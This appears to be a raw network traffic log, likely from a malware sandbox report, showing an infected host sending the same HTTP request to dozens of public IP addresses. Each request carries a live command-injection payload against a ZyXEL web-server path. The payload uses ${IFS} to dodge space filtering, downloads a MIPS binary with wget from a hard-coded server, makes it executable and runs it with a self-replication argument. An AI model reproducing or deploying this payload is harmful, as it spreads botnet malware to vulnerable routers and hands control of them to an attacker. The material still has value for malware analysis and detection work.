                                              Jan 29, 2024 07:03:51.032047987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4679192.168.2.1456016157.100.104.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032089949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4680192.168.2.1439596206.46.174.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032123089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4681192.168.2.1437234198.36.124.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032161951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4682192.168.2.1453846143.127.122.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032200098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4683192.168.2.1439586145.220.188.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032210112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4684192.168.2.144704061.118.64.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032258987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4685192.168.2.1440306143.159.60.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032295942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4686192.168.2.1435882158.198.145.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032330036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4687192.168.2.145394089.218.63.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032361031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4688192.168.2.145886873.67.9.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032397985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4689192.168.2.1451820158.41.50.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032438993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4690192.168.2.1440396140.254.211.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032490015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4691192.168.2.144322884.194.94.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032515049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4692192.168.2.1439304101.200.115.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032565117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4693192.168.2.144201648.166.180.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032579899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4694192.168.2.1449600198.126.109.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032632113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4695192.168.2.1434728193.122.54.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032685041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4696192.168.2.145955647.9.249.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032736063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4697192.168.2.145426466.83.113.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032747984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4698192.168.2.145986258.2.150.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032790899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4699192.168.2.1456114181.224.139.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032828093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4700192.168.2.145819063.53.119.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032845974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4701192.168.2.145430840.196.117.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032886028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4702192.168.2.143348890.223.110.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032929897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4703192.168.2.1432788147.125.132.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.032979012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4704192.168.2.143373617.192.108.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033014059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4705192.168.2.1433462147.183.221.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033045053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4706192.168.2.145465863.222.245.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033083916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4707192.168.2.144885276.58.248.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033108950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4708192.168.2.1453020118.66.55.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033159018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4709192.168.2.1445358223.208.157.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033189058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4710192.168.2.145813047.46.12.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033209085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4711192.168.2.1457488133.65.205.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033241034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4712192.168.2.1460732195.249.73.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033253908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4713192.168.2.144869877.80.241.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033294916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4714192.168.2.1443034138.191.56.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033322096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4715192.168.2.1439226132.39.69.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033374071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4716192.168.2.1453578141.91.4.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033415079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4717192.168.2.144454851.157.232.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033464909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4718192.168.2.1455150116.239.90.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033489943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4719192.168.2.1436426155.149.66.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033529997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4720192.168.2.143951841.196.102.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033585072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4721192.168.2.144857487.128.246.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033617973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4722192.168.2.1440778121.6.137.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033652067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4723192.168.2.14522429.155.90.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033680916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4724192.168.2.144058617.127.48.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033718109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4725192.168.2.1433036138.21.126.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033763885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4726192.168.2.1460008126.170.195.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033783913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4727192.168.2.1449800126.145.25.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033824921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4728192.168.2.1452456134.209.249.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033860922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4729192.168.2.144181859.129.98.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033880949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4730192.168.2.14436624.90.240.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033915043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4731192.168.2.1435990160.201.215.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033952951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4732192.168.2.145103632.174.127.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.033986092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4733192.168.2.1435216139.0.12.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034023046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4734192.168.2.1455238113.94.16.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034056902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4735192.168.2.144598617.64.3.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034111023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4736192.168.2.1453570115.132.166.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034146070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4737192.168.2.1448626143.250.144.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034207106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4738192.168.2.145623838.49.31.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034224033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4739192.168.2.1457832177.54.102.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034239054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4740192.168.2.144490268.252.14.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034269094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4741192.168.2.1447970175.216.118.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:51.034310102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4742192.168.2.144099094.163.237.34443
                                              TimestampBytes transferredDirectionData
